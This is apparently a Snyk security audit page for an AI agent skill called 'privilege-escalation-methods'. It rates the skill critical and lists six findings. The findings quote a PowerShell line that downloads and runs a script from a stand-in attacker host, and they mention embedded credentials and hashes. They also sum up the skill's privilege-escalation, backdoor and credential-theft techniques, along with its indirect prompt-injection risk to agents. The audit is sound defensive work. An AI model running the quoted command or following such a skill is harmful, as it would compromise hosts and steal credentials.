Skills
skills/sickn33/antigravity-awesome-skills/privilege-escalation-methods/Snyk

privilege-escalation-methods

Fail

Audited by Snyk on Mar 21, 2026

Risk Level: CRITICAL
Full Analysis

HIGH W007: Insecure credential handling detected in skill instructions.

  • Insecure credential handling detected (high risk: 1.00). The prompt includes commands and examples that embed credentials and secrets verbatim (e.g., user:password, -u/-p flags, /rc4:<NTLM_HASH>, Password123), so an agent following it would need to accept and output secret values directly.

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 1.00). http://attacker/shell.ps1 is highly suspicious: it's a direct HTTP link to an untrusted host serving a .ps1 PowerShell script (a common malware delivery vector), so downloading/executing it is dangerous.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This document is an explicit, actionable playbook for privilege escalation, credential theft, persistence, and domain compromise (including commands to exfiltrate hashes, create backdoors, run remote payloads, abuse sudo/cron/services, and use Mimikatz/Rubeus/Responder), and is clearly intended to enable unauthorized or malicious post‑exploitation activity.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The skill's SKILL.md explicitly instructs creating a scheduled task that runs "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'" (Golden Ticket with Scheduled Tasks section), which directs the agent/workflow to fetch and execute arbitrary content from an external URL, satisfying ingestion of untrusted third‑party content that can change subsequent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill includes an explicit runtime command that downloads and executes remote code via PowerShell (iex (iwr http://attacker/shell.ps1)), which fetches and runs a remote script during execution.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). This skill explicitly instructs the agent on techniques to gain root/Administrator, modify system files, set SUID bits, create persistent backdoors and user accounts, and perform other state-changing actions on target machines, thus encouraging compromise of the host it runs on.

Issues (6)

W007
HIGH

Insecure credential handling detected in skill instructions.

E005
CRITICAL

Suspicious download URL detected in skill instructions.

E006
CRITICAL

Malicious code pattern detected in skill scripts.

W011
MEDIUM

Third-party content exposure detected (indirect prompt injection risk).

W012
MEDIUM

Unverifiable external dependency detected (runtime URL that controls agent).

W013
MEDIUM

Attempt to modify system services in skill instructions.

Audit Metadata
Risk Level
CRITICAL
Analyzed
Mar 21, 2026, 09:25 AM
Issues
6